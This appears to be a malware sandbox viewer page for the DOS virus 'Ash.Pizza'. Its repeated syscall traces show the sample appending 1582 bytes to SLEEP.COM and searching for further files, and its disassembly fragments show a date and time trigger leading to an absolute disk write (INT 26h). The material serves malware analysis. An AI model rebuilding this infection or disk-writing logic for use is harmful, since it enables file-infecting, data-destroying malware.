Sample viewer

vx.netlux.org/Virus.DOS.Ash.Pizza.x

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:46:18.804378499Z 26 PC: 12acb | Set disk transfer address
2018-12-17T22:46:18.805889691Z 78 PC: 12b23 | Find first file
2018-12-17T22:46:18.811842743Z 61 PC: 12b2f | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:18.817927058Z 63 PC: 12b3e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:18.824442126Z 66 PC: 12b55 | Move file pointer
2018-12-17T22:46:18.825787073Z 64 PC: 12b69 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:18.828844335Z 64 PC: 12a71 | Write file or device (Write 1582 bytes on handle 5)
2018-12-17T22:46:19.098122715Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:46:19.099447761Z 64 PC: 12ba9 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:19.105863908Z 62 PC: 12b17 | Close file
2018-12-17T22:46:19.11464696Z 79 PC: 12b23 | Find next file
2018-12-17T22:46:19.117281873Z 61 PC: 12b2f | Open file (Filename = '')
2018-12-17T22:46:19.119300719Z 79 PC: 12b23 | Find next file
2018-12-17T22:46:19.121886498Z 61 PC: 12b2f | Open file (Filename = '')
2018-12-17T22:46:19.124199271Z 79 PC: 12b23 | Find next file
2018-12-17T22:46:19.1266116Z 61 PC: 12b2f | Open file (Filename = '')
2018-12-17T22:46:19.131022619Z 79 PC: 12b23 | Find next file
2018-12-17T22:46:19.133416334Z 61 PC: 12b2f | Open file (Filename = '')
2018-12-17T22:46:19.135348143Z 79 PC: 12b23 | Find next file
2018-12-17T22:46:19.137601719Z 61 PC: 12b2f | Open file (Filename = '')
2018-12-17T22:46:19.139792389Z 79 PC: 12b23 | Find next file
2018-12-17T22:46:19.141625853Z 61 PC: 12b2f | Open file (Filename = '')
2018-12-17T22:46:19.143862947Z 79 PC: 12b23 | Find next file
2018-12-17T22:46:19.147354716Z 59 PC: 12bd7 | Change current directory
2018-12-17T22:46:19.151579433Z 42 PC: 12be6 | Get date 0x12be6: cmp dl, 4
0x12be9: jne 0x12bf5
0x12beb: cmp dh, 7
0x12bee: jne 0x12bf5
0x12bf0: xor ax, ax
0x12bf2: jmp 0x12c13
0x12bf4: nop
0x12bf5: mov ah, 0x2c
0x12bf7: int 0x21
0x12bf9: or cl, cl
0x12bfb: jne 0x12c20
0x12bfd: cmp ch, 6
0x12c00: jge 0x12c20
0x12c02: add cl, ch
0x12c04: mov ax, cx
0x12c06: cwde
0x12c07: add al, dh
0x12c09: adc al, dl
0x12c0b: adc ah, 0
0x12c0e: or ax, ax
2018-12-17T22:46:19.154023922Z 44 PC: 12bf9 | Get time 0x12bf9: or cl, cl
0x12bfb: jne 0x12c20
0x12bfd: cmp ch, 6
0x12c00: jge 0x12c20
0x12c02: add cl, ch
0x12c04: mov ax, cx
0x12c06: cwde
0x12c07: add al, dh
0x12c09: adc al, dl
0x12c0b: adc ah, 0
0x12c0e: or ax, ax
0x12c10: jne 0x12c13
0x12c12: inc ax
0x12c13: mov dx, ax
0x12c15: mov cx, 1
0x12c18: xor bx, bx
0x12c1a: mov ah, 0x19
0x12c1c: int 0x21
0x12c1e: int 0x26
0x12c20: mov bx, 0x3cd
2018-12-17T22:46:19.157087138Z 44 PC: 12c27 | Get time 0x12c27: inc dh
0x12c29: cmp dh, byte ptr [0x3f5]
0x12c2d: jl 0x12c35
0x12c2f: sub dh, byte ptr [0x3f5]
0x12c33: jmp 0x12c29
0x12c35: mov al, dh
0x12c37: mov cl, al
0x12c39: cwde
0x12c3a: shl ax, 1
0x12c3c: add bx, ax
0x12c3e: mov si, word ptr [bx]
0x12c40: mov ch, byte ptr [si - 1]
0x12c43: mov dx, si
0x12c45: mov ah, 9
0x12c47: int 0x21
0x12c49: cmp ch, 0
0x12c4c: je 0x12c77
0x12c4e: cmp ch, 1
0x12c51: je 0x12c51
0x12c53: cmp ch, 2
2018-12-17T22:46:19.159200459Z 9 PC: 12c49 | Display string (Could not find end pointer)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8840,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:57.769814445Z 26 PC: 12acb | Set disk transfer address
2018-12-25T12:21:57.771211235Z 78 PC: 12b23 | Find first file
2018-12-25T12:21:57.776906985Z 61 PC: 12b2f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:57.783112244Z 63 PC: 12b3e | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:21:57.78944477Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:21:57.790703038Z 64 PC: 12b69 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:57.793754058Z 64 PC: 12a71 | Write file or device (Write 1582 bytes on handle 5)
2018-12-25T12:21:58.893682984Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:21:58.895259232Z 64 PC: 12ba9 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:58.902123721Z 62 PC: 12b17 | Close file
2018-12-25T12:21:58.980098976Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:58.982527559Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:58.983919366Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:58.985490187Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:58.987624598Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:58.989691712Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:58.991090884Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:58.993198379Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:58.99463482Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:58.996251522Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:58.99819666Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:58.999925597Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:59.001415527Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:59.003620567Z 59 PC: 12bd7 | Change current directory
2018-12-25T12:21:59.006194391Z 42 PC: 12be6 | Get date 0x12be6: cmp dl, 4
0x12be9: jne 0x12bf5
0x12beb: cmp dh, 7
0x12bee: jne 0x12bf5
0x12bf0: xor ax, ax
0x12bf2: jmp 0x12c13
0x12bf4: nop
0x12bf5: mov ah, 0x2c
0x12bf7: int 0x21
0x12bf9: or cl, cl
0x12bfb: jne 0x12c20
0x12bfd: cmp ch, 6
0x12c00: jge 0x12c20
0x12c02: add cl, ch
0x12c04: mov ax, cx
0x12c06: cwde
0x12c07: add al, dh
0x12c09: adc al, dl
0x12c0b: adc ah, 0
0x12c0e: or ax, ax
2018-12-25T12:21:59.007625516Z 44 PC: 12bf9 | Get time 0x12bf9: or cl, cl
0x12bfb: jne 0x12c20
0x12bfd: cmp ch, 6
0x12c00: jge 0x12c20
0x12c02: add cl, ch
0x12c04: mov ax, cx
0x12c06: cwde
0x12c07: add al, dh
0x12c09: adc al, dl
0x12c0b: adc ah, 0
0x12c0e: or ax, ax
0x12c10: jne 0x12c13
0x12c12: inc ax
0x12c13: mov dx, ax
0x12c15: mov cx, 1
0x12c18: xor bx, bx
0x12c1a: mov ah, 0x19
0x12c1c: int 0x21
0x12c1e: int 0x26
0x12c20: mov bx, 0x3cd
2018-12-25T12:21:59.010466008Z 25 PC: 12c1e | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8840,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:58.364254968Z 26 PC: 12acb | Set disk transfer address
2018-12-25T12:21:58.365785171Z 78 PC: 12b23 | Find first file
2018-12-25T12:21:58.371740255Z 61 PC: 12b2f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:58.378595631Z 63 PC: 12b3e | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:21:58.402355903Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:21:58.403738957Z 64 PC: 12b69 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:58.406989351Z 64 PC: 12a71 | Write file or device (Write 1582 bytes on handle 5)
2018-12-25T12:21:59.140843351Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:21:59.143120997Z 64 PC: 12ba9 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:59.150380804Z 62 PC: 12b17 | Close file
2018-12-25T12:21:59.158712203Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:59.162707151Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:59.164819037Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:59.167257375Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:59.170485358Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:59.173020803Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:59.175122369Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:59.178267944Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:59.180525464Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:59.183169662Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:59.18597112Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:59.188518764Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:59.190795991Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:59.193989752Z 59 PC: 12bd7 | Change current directory
2018-12-25T12:21:59.197921688Z 42 PC: 12be6 | Get date 0x12be6: cmp dl, 4
0x12be9: jne 0x12bf5
0x12beb: cmp dh, 7
0x12bee: jne 0x12bf5
0x12bf0: xor ax, ax
0x12bf2: jmp 0x12c13
0x12bf4: nop
0x12bf5: mov ah, 0x2c
0x12bf7: int 0x21
0x12bf9: or cl, cl
0x12bfb: jne 0x12c20
0x12bfd: cmp ch, 6
0x12c00: jge 0x12c20
0x12c02: add cl, ch
0x12c04: mov ax, cx
0x12c06: cwde
0x12c07: add al, dh
0x12c09: adc al, dl
0x12c0b: adc ah, 0
0x12c0e: or ax, ax
2018-12-25T12:21:59.199934698Z 44 PC: 12bf9 | Get time 0x12bf9: or cl, cl
0x12bfb: jne 0x12c20
0x12bfd: cmp ch, 6
0x12c00: jge 0x12c20
0x12c02: add cl, ch
0x12c04: mov ax, cx
0x12c06: cwde
0x12c07: add al, dh
0x12c09: adc al, dl
0x12c0b: adc ah, 0
0x12c0e: or ax, ax
0x12c10: jne 0x12c13
0x12c12: inc ax
0x12c13: mov dx, ax
0x12c15: mov cx, 1
0x12c18: xor bx, bx
0x12c1a: mov ah, 0x19
0x12c1c: int 0x21
0x12c1e: int 0x26
0x12c20: mov bx, 0x3cd
2018-12-25T12:21:59.202941609Z 25 PC: 12c1e | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8840,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:05.154500879Z 26 PC: 12acb | Set disk transfer address
2018-12-25T12:22:05.156191809Z 78 PC: 12b23 | Find first file
2018-12-25T12:22:05.162293128Z 61 PC: 12b2f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:05.16893266Z 63 PC: 12b3e | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:05.175832107Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:22:05.177593284Z 64 PC: 12b69 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:05.18185518Z 64 PC: 12a71 | Write file or device (Write 1582 bytes on handle 5)
2018-12-25T12:22:05.196719773Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:22:05.198421748Z 64 PC: 12ba9 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:05.204691234Z 62 PC: 12b17 | Close file
2018-12-25T12:22:05.218102318Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.220156986Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.221859566Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.224230135Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.227027912Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.229443066Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.231400273Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.234182262Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.236266811Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.238696209Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.241506947Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.243896965Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.245860265Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.248654827Z 59 PC: 12bd7 | Change current directory
2018-12-25T12:22:05.252735852Z 42 PC: 12be6 | Get date 0x12be6: cmp dl, 4
0x12be9: jne 0x12bf5
0x12beb: cmp dh, 7
0x12bee: jne 0x12bf5
0x12bf0: xor ax, ax
0x12bf2: jmp 0x12c13
0x12bf4: nop
0x12bf5: mov ah, 0x2c
0x12bf7: int 0x21
0x12bf9: or cl, cl
0x12bfb: jne 0x12c20
0x12bfd: cmp ch, 6
0x12c00: jge 0x12c20
0x12c02: add cl, ch
0x12c04: mov ax, cx
0x12c06: cwde
0x12c07: add al, dh
0x12c09: adc al, dl
0x12c0b: adc ah, 0
0x12c0e: or ax, ax
2018-12-25T12:22:05.254716434Z 44 PC: 12bf9 | Get time 0x12bf9: or cl, cl
0x12bfb: jne 0x12c20
0x12bfd: cmp ch, 6
0x12c00: jge 0x12c20
0x12c02: add cl, ch
0x12c04: mov ax, cx
0x12c06: cwde
0x12c07: add al, dh
0x12c09: adc al, dl
0x12c0b: adc ah, 0
0x12c0e: or ax, ax
0x12c10: jne 0x12c13
0x12c12: inc ax
0x12c13: mov dx, ax
0x12c15: mov cx, 1
0x12c18: xor bx, bx
0x12c1a: mov ah, 0x19
0x12c1c: int 0x21
0x12c1e: int 0x26
0x12c20: mov bx, 0x3cd
2018-12-25T12:22:05.259169274Z 44 PC: 12c27 | Get time 0x12c27: inc dh
0x12c29: cmp dh, byte ptr [0x3f5]
0x12c2d: jl 0x12c35
0x12c2f: sub dh, byte ptr [0x3f5]
0x12c33: jmp 0x12c29
0x12c35: mov al, dh
0x12c37: mov cl, al
0x12c39: cwde
0x12c3a: shl ax, 1
0x12c3c: add bx, ax
0x12c3e: mov si, word ptr [bx]
0x12c40: mov ch, byte ptr [si - 1]
0x12c43: mov dx, si
0x12c45: mov ah, 9
0x12c47: int 0x21
0x12c49: cmp ch, 0
0x12c4c: je 0x12c77
0x12c4e: cmp ch, 1
0x12c51: je 0x12c51
0x12c53: cmp ch, 2
2018-12-25T12:22:05.261217144Z 9 PC: 12c49 | Display string (Could not find end pointer)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8840,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:05.771763044Z 26 PC: 12acb | Set disk transfer address
2018-12-25T12:22:05.773299951Z 78 PC: 12b23 | Find first file
2018-12-25T12:22:05.779201379Z 61 PC: 12b2f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:05.785697497Z 63 PC: 12b3e | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:05.792543937Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:22:05.793889825Z 64 PC: 12b69 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:05.797190054Z 64 PC: 12a71 | Write file or device (Write 1582 bytes on handle 5)
2018-12-25T12:22:05.812219919Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:22:05.813716916Z 64 PC: 12ba9 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:05.8199969Z 62 PC: 12b17 | Close file
2018-12-25T12:22:05.82890206Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.832581203Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.834724774Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.83713006Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.839315763Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.841766584Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.843918194Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.847127565Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.84942665Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.852118676Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.854639958Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.856960871Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.859005196Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.862444002Z 59 PC: 12bd7 | Change current directory
2018-12-25T12:22:05.866387678Z 42 PC: 12be6 | Get date 0x12be6: cmp dl, 4
0x12be9: jne 0x12bf5
0x12beb: cmp dh, 7
0x12bee: jne 0x12bf5
0x12bf0: xor ax, ax
0x12bf2: jmp 0x12c13
0x12bf4: nop
0x12bf5: mov ah, 0x2c
0x12bf7: int 0x21
0x12bf9: or cl, cl
0x12bfb: jne 0x12c20
0x12bfd: cmp ch, 6
0x12c00: jge 0x12c20
0x12c02: add cl, ch
0x12c04: mov ax, cx
0x12c06: cwde
0x12c07: add al, dh
0x12c09: adc al, dl
0x12c0b: adc ah, 0
0x12c0e: or ax, ax
2018-12-25T12:22:05.868477702Z 44 PC: 12bf9 | Get time 0x12bf9: or cl, cl
0x12bfb: jne 0x12c20
0x12bfd: cmp ch, 6
0x12c00: jge 0x12c20
0x12c02: add cl, ch
0x12c04: mov ax, cx
0x12c06: cwde
0x12c07: add al, dh
0x12c09: adc al, dl
0x12c0b: adc ah, 0
0x12c0e: or ax, ax
0x12c10: jne 0x12c13
0x12c12: inc ax
0x12c13: mov dx, ax
0x12c15: mov cx, 1
0x12c18: xor bx, bx
0x12c1a: mov ah, 0x19
0x12c1c: int 0x21
0x12c1e: int 0x26
0x12c20: mov bx, 0x3cd
2018-12-25T12:22:05.876126622Z 44 PC: 12c27 | Get time 0x12c27: inc dh
0x12c29: cmp dh, byte ptr [0x3f5]
0x12c2d: jl 0x12c35
0x12c2f: sub dh, byte ptr [0x3f5]
0x12c33: jmp 0x12c29
0x12c35: mov al, dh
0x12c37: mov cl, al
0x12c39: cwde
0x12c3a: shl ax, 1
0x12c3c: add bx, ax
0x12c3e: mov si, word ptr [bx]
0x12c40: mov ch, byte ptr [si - 1]
0x12c43: mov dx, si
0x12c45: mov ah, 9
0x12c47: int 0x21
0x12c49: cmp ch, 0
0x12c4c: je 0x12c77
0x12c4e: cmp ch, 1
0x12c51: je 0x12c51
0x12c53: cmp ch, 2
2018-12-25T12:22:05.878525102Z 9 PC: 12c49 | Display string (Could not find end pointer)